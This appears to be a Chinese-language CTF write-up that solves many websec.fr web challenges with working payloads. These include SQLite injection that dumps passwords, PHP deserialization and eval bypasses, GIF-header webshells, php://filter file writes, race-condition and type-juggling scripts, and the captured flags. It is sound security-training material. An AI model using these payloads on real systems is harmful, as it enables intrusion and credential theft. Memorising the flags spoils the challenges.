2018-12-5
level-1
整型注入
payload
-1 union select 1,2
根据报错信息可知使用的是 sqlite 数据库
payload: -1 union select 1, sql from sqlite_master Other User Details: id -> 1 username -> CREATE TABLE users(id int(7), username varchar(255), password varchar(255)) payload: -1 union select 1, password from users where id=1
flag
WEBSEC{Simple_SQLite_Injection}
level 4
查看源码可知是一个反序列化,这里还需要使用
as
来设置别名,因为输出的只有username
。<?php class SQL { public $query = ''; public $conn; } $a = new SQL(); //$a->query = "select sql as username from sqlite_master"; $a->query = "select password as username from users"; echo base64_encode(serialize($a));
flag
WEBSEC{9abd8e8247cbe62641ff662e8fbb662769c08500}
level 17
<?php if (! strcasecmp ($_POST['flag'], $flag)) echo '<div >Here is your flag: <mark>' . $flag . '</mark>.</div>'; else echo '<div >Invalid flag, sorry.</div>'; ?>
strcasecmp函数在处理数组时会返回
0
flag
WEBSEC{It_seems_that_php_could_use_a_stricter_typing_system}
level 25
如果url为///index.php/?,parse_url函数就会返回flase.
payload
http://websec.fr///level25/index.php?page=flag
flag
WEBSEC{How_am_I_supposed_to_parse_uri_when_everything_is_so_broooken}
level 28
源码
<?php if(isset($_POST['submit'])) { if ($_FILES['flag_file']['size'] > 4096) { die('Your file is too heavy.'); } $filename = md5($_SERVER['REMOTE_ADDR']) . '.php'; $fp = fopen($_FILES['flag_file']['tmp_name'], 'r'); $flagfilecontent = fread($fp, filesize($_FILES['flag_file']['tmp_name'])); @fclose($fp); file_put_contents($filename, $flagfilecontent); if (md5_file($filename) === md5_file('flag.php') && $_POST['checksum'] == crc32($_POST['checksum'])) { include($filename); // it contains the `$flag` variable } else { $flag = "Nope, $filename is not the right file, sorry."; sleep(1); // Deter bruteforce } unlink($filename); } ?>
由代码可知在进行检验后会sleep 1 秒之后再删除文件,很明显的条件竞争。
脚本
import requests url = 'https://websec.fr/level28/3145c26f770646156102f6eb07129fdc.php' for x in range(1,50): a = requests.get(url) print a.text
先运行脚本,然后上传
1.php
如下。<?php echo file_get_contents('./flag.php');?>
flag
WEBSEC{Can_w3_please_h4ve_mutexes_in_PHP_naow?_Wait_there_is_a_pthread_module_for_php?!_Awwww:/}
level 2
双写绕过
payload
-1 ununionion seselectlect 1, sql frfromom sqlite_master //CREATE TABLE users(id int(7), username varchar(255), password varchar(255)) -1 ununionion seselectlect 1,password frfromom users //WEBSEC{BecauseBlacklistsAreOftenAgoodIdea}
flag
WEBSEC{BecauseBlacklistsAreOftenAgoodIdea}
level 8
通过代码可知是通过
exif_imagetype
函数来检测文件头。图片马
GIF89a\00\00\E6\00 <?php print_r(scandir("./"));?>
利用scandir函数读取目录结果如下
GIF89a\00\00\E6\00Array ( [0] => . [1] => .. [2] => flag.txt [3] => index.php [4] => php-fpm.sock [5] => source.php [6] => uploads )
读取flag.txt
GIF89a\00\00\E6\00 <?php echo file_get_contents('./flag.txt');?>
flag
WEBSEC{BypassingImageChecksToRCE}
level 10
爆破构造
substr (md5 ($flag . $file . $flag), 0, 8);
为0e开头的脚本
import requests x=0 while 1: x=x+1 url = 'https://websec.fr/level10/index.php?f=.%sflag.php&hash=0'%('/'*x) a = requests.get(url) print x if "Permission denied!" not in a.text: print a.text break
跑到800+....
flag
WEBSEC{Lose_typ1ng_system_are_super_great_aren't_them?}
level 11
源码
<?php ini_set('display_errors', 'on'); ini_set('error_reporting', E_ALL); function sanitize($id, $table) { /* Rock-solid: https://secure.php.net/manual/en/function.is-numeric.php */if (! is_numeric ($id) or $id < 2) { exit("The id must be numeric, and superior to one."); } /* Rock-solid too! */ $special1 = ["!", "\"", "#", "$", "%", "&", "'", "*", "+", "-"]; $special2 = [".", "/", ":", ";", "<", "=", ">", "?", "@", "[", "\\", "]"]; $special3 = ["^", "_", "`", "{", "|", "}"]; $sql = ["union", "0", "join", "as"]; $blacklist = array_merge ($special1, $special2, $special3, $sql); foreach ($blacklist as $value) { if (stripos($table, $value) !== false) exit("Presence of '" . $value . "' detected: abort, abort, abort!\n"); } } if (isset ($_POST['submit']) && isset ($_POST['user_id']) && isset ($_POST['table'])) { $id = $_POST['user_id']; $table = $_POST['table']; sanitize($id, $table); $pdo = new SQLite3('database.db', SQLITE3_OPEN_READONLY); $query = 'SELECT id,username FROM ' . $table . ' WHERE id = ' . $id; //$query = 'SELECT id,username,enemy FROM ' . $table . ' WHERE id = ' . $id; $getUsers = $pdo->query($query); $users = $getUsers->fetchArray(SQLITE3_ASSOC); $userDetails = false; if ($users) { $userDetails = $users; $userDetails['table'] = htmlentities($table); } } ?>
子查询注入SQLite3和mysql的子查询有一点区别。测试如下。
mysql
mysql> select id,password from user; +----+----------------------------------+ | id | password | +----+----------------------------------+ | 1 | 7694f4a66316e53c8cdd9d9954bd611d | | 2 | d41d8cd98f00b204e9800998ecf8427e | | 3 | 0cc175b9c0f1b6a831c399e269772661 | +----+----------------------------------+ 3 rows in set (0.00 sec) mysql> select id,password from (select id,password from user); ERROR 1248 (42000): Every derived table must have its own alias
SQLite3
sqlite> select id,password from users; 1|qq 2|ww 3|ee sqlite> select id,password from (select id,password from users); 1|qq 2|ww 3|ee
由结果可知sqlite3可以在form后使用子查询当做结果集,mysql里form后面必须是表名。
不过mysql和sqlite3都可以这样起别名。
mysql> select * from user; +----+----------+----------------------------------+-------------+-------+------+ | id | username | password | server | email | sign | +----+----------+----------------------------------+-------------+-------+------+ | 1 | q | 7694f4a66316e53c8cdd9d9954bd611d | dasdass | 1 | 1 | | 2 | | d41d8cd98f00b204e9800998ecf8427e | imap.qq.com | 1 | 1 | | 3 | a | 0cc175b9c0f1b6a831c399e269772661 | imap.qq.com | a | a | +----+----------+----------------------------------+-------------+-------+------+ 3 rows in set (0.00 sec) mysql> select id username from user; +----------+ | username | +----------+ | 1 | | 2 | | 3 | +----------+ SQLite3 sqlite> select id,username from users; 1|aa 2|bb 3|cc sqlite> select id username from users; 1 2 3
在源码的注释里面有这样一句
//$query = 'SELECT id,username,enemy FROM ' . $table . ' WHERE id = ' . $id;
构造语句读取
enemy
。id =2 table = (select 2 id,enemy username from costume)
得到flag
WEBSEC{Who_needs_AS_anyway_when_you_have_sqlite}
level 15
payload
}echo $flag;/*
flag
WEBSEC{HHVM_was_right_about_not_implementing_eval}
level 20
关键代码
function sanitize($data) { /* i0n1c's bypass won't save you this time! (https://www.exploit-db.com/exploits/22547/) */ if ( ! preg_match ('/[A-Z]:/', $data)) { return unserialize ($data); } if ( ! preg_match ('/(^|;|{|})O:[0-9+]+:"/', $data )) { return unserialize ($data); } return false; }
需要在这里反序列化,然后触发
__destruct
方法。分析正则,第一个是匹配大写字符加冒号的。
第二个会匹配
O:
。
在序列化数据里面,开头的字母表示了序列化数据的类型。O
则表示序列化的是一个class。PHP 5 中增加了接口(interface)功能。PHP 5 本身提供了一个 Serializable 接口,如果用户在自己定义的类中实现了这个接口,那么在该类的对象序列化时,就会被按照用户实现的方式去进行序列化,并且序列化后的标示不再是 O,而改为 C。
这里可以尝试使用
C:
来代替O:
payload
C:4:"Flag":0:{} base64 : Qzo0OiJGbGFnIjowOnt9
flag
WEBSEC{CVE-2012-5692_was_a_lof_of_phun_thanks_to_i0n1c_but_this_was_not_the_only_bypass}
level 22
代码
<?php class A { public $pub; protected $pro ; private $pri; function __construct($pub, $pro, $pri) { $this->pub = $pub; $this->pro = $pro; $this->pri = $pri; } } include 'file_containing_the_flag_parts.php'; $a = new A($f1, $f2, $f3); unset($f1); unset($f2); unset($f3); $funcs_internal = get_defined_functions()['internal']; /* lets allow some secure funcs here */unset ($funcs_internal[array_search('strlen', $funcs_internal)]); unset ($funcs_internal[array_search('print', $funcs_internal)]); unset ($funcs_internal[array_search('strcmp', $funcs_internal)]); unset ($funcs_internal[array_search('strncmp', $funcs_internal)]); $funcs_extra = array ('eval', 'include', 'require', 'function'); $funny_chars = array ('\.', '\+', '-', '"', ';', '`', '\[', '\]'); $variables = array ('_GET', '_POST', '_COOKIE', '_REQUEST', '_SERVER', '_FILES', '_ENV', 'HTTP_ENV_VARS', '_SESSION', 'GLOBALS'); $blacklist = array_merge($funcs_internal, $funcs_extra, $funny_chars, $variables); $insecure = false; foreach ($blacklist as $blacklisted) { if (preg_match ('/' . $blacklisted . '/im', $code)) { $insecure = true; break; } } if ($insecure) { echo 'Insecure code detected!'; } else { eval ("echo $code;"); } // $blacklist{579}($a)?>
函数
get_defined_functions()
是获取所有已经定义的函数。$blacklist
变量则是整合了几个数组。最终的这个数组的value是所有定义的函数名。过滤的时候,会过滤所有的函数。但是$blacklist
这个数组并没有被过滤。可以想到动态执行函数。
<?php $a = array('phpinfo'); $a{0}(); //成功执行phpinfo()函数。// $a[0](); 成功执行phpinfo()函数。?>
先写脚本找到
var_dump
的位置。import requests import re for x in xrange(31,1000): url = 'https://websec.fr/level22/index.php?code=%%24blacklist%%7B%s%%7D'%(x) a = requests.get(url) fun = re.findall('\n(.*?)</pre>',a.text) print(str(x)+':'+fun[0]) if fun[0] == 'var_dump': break
结果是
579
payload
$blacklist{579}($a);
flag
object(A)#1 (3) { ["pub"]=> string(17) "WEBSEC{But_I_was_" ["pro":protected]=> string(18) "told_that_OOP_was_" ["pri":"A":private]=> string(22) "flawless_and_stuff_:<}" } WEBSEC{But_I_was_told_that_OOP_was_flawless_and_stuff_:<}
level 24
代码
<?php ini_set('display_errors', 'on'); ini_set('error_reporting', E_ALL); session_start(); include 'clean_up.php'; /* periodic cleanup */foreach (glob("./uploads/*") as $file) { if (is_file($file)) { unlink($file); } else { if (time() - filemtime($file) >= 60 * 60 * 24 * 7) { Delete($file); } } } $upload_dir = sprintf("./uploads/%s/", session_id()); @mkdir($upload_dir, 0755, true); /* sandboxing ! */ chdir($upload_dir); ini_set('open_basedir', '.'); $p = "list"; $data = ""; $filename = ""; if (isset($_GET['p']) && isset($_GET['filename']) ) { $filename = $_GET['filename']; if ($_GET['p'] === "edit") { $p = "edit"; if (isset($_POST['data'])) { $data = $_POST['data']; if (strpos($data, '<?') === false && stripos($data, 'script') === false) { # no interpretable code please. file_put_contents($_GET['filename'], $data); die ('<meta http-equiv="refresh" content="0; url=.">'); } } elseif (file_exists($_GET['filename'])){ $data = file_get_contents($_GET['filename']); } } } ?>
代码会对上传的文件内容做检测,前两个字符不可以是
<?
,这里写入文件内容的函数是file_put_contents()
,随即想到file_put_contents()函数的第一个参数可以使用php伪协议。可以将shell进行编码后,在通过php伪协议解码再写入文件。示例
<?php $a = base64_encode("<?php echo 111; ?>"); $b = file_put_contents('php://filter/convert.base64-decode/resource=11.php',$a); ?>
新建的11.php
<?php echo 111; ?>
filename
php://filter/convert.base64-decode/resource=11.php
文件内容
PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnLi4vLi4vZmxhZy5waHAnKTsgPz4=
然后访问11.php,查看源码即可得到flag。
WEBSEC{no_javascript_no_php_I_guess_you_used_COBOL_to_get_a_RCE_right?}
level 03
哈希碰撞,随便输入一串字符,显示的hash值如下
7c00249d409a91ab84e3f421c193520d9fb3674b
测试
$hash = password_hash("\x00 abc", PASSWORD_DEFAULT); var_dump(password_verify("\x00 foo", $hash)); //true
所以找到一串sha1之后的前四位是
7c00
的hash即可。
flagWEBSEC{Please_Do_not_combine_rAw_hash_functions_mi}
level 5
payload
https://websec.fr/level05/index.php?q={${include$_GET[a]}}&a=php://filter/read=convert.base64-encode/resource=/flag.php
flag
WEBSEC{Writing_a_sp3llcheckEr_in_php_aint_no_fun}
level 09
题目源代码
<?php ini_set('display_errors', 'on'); ini_set('error_reporting', E_ALL); if( isset ($_GET['submit']) && isset ($_GET['c'])) { $randVal = sha1 (time ()); echo $randVal; setcookie ('session_id', $randVal, time () + 2, '', '', true, true); try { $fh = fopen('/tmp/' . $randVal, 'w'); fwrite ($fh,str_replace (['<?', '?>', '"', "'", '$', '&', '|', '{', '}', ';', '#', ':', '#', ']', '[', ',', '%', '(', ')'],'',$_GET['c'])); fclose($fh); } catch (Exception $e) { var_dump ($e->getMessage ()); } } if (isset ($_GET['cache_file'])) { if (file_exists ($_GET['cache_file'])) { echo eval (stripcslashes(file_get_contents ($_GET['cache_file']))); } } show_source(__FILE__); ?>
题目会将
$_GET['c']
的值写入/tmp/sha(time())
文件中,下面的代码会获取$_GET['cache_file']
文件内容,思路很明确,将代码写入tmp目录下的文件中,然后通过$_GET['cache_file']获取写入的文件名(文件名存储在cookie中)。然后执行写入的内容。有两种解法
界定符
这里include+定界符来包含文件。
<?php $a = "include<<<EOD phpinfo.php EOD ?> "; eval($a);
进制
测试代码
<?php $a = "include\50\42flag.txt\42\51\73"; echo $a."<br>"; echo stripcslashes($a).'<br data-tomark-pass>'; echo eval(stripcslashes($a)); ?>
八进制对应的字符如下
\50 -> ( \42 -> ' \42 -> ' \51 -> ) \73 -> ;
测试16进制也可以。
至于为什么进制可以当做字符,是因为前面的
\
,会将进制转换为字符。输出结果
由输出结果可知
编写脚本如下
import requests r = requests.session() data1 = "include\\x28\\42flag.txt\\42\\51\\73" # 这里有两个\\是为了转义,否则在写入文件之前就会将字符过滤。# data1 = 'echo file_get_contents\\50\\42flag.txt\\42\\51\\73'# data1 = """include<<<EOD# flag.txt# EOD# ??>>""" sub = '1' url = 'https://websec.fr/level09/index.php?submit=%s&c=%s'%(sub,data1) text1 = r.get(url) print(text1.cookies['session_id']) filename = '/tmp/'+text1.cookies['session_id'] print(filename) url_1 = 'https://websec.fr/level09/index.php?submit=%s&c=%s&cache_file=%s'%(sub,data1,filename) text2 = r.get(url_1) print(text2.text)
flag
WEBSEC{stripcslashes_to_bypass}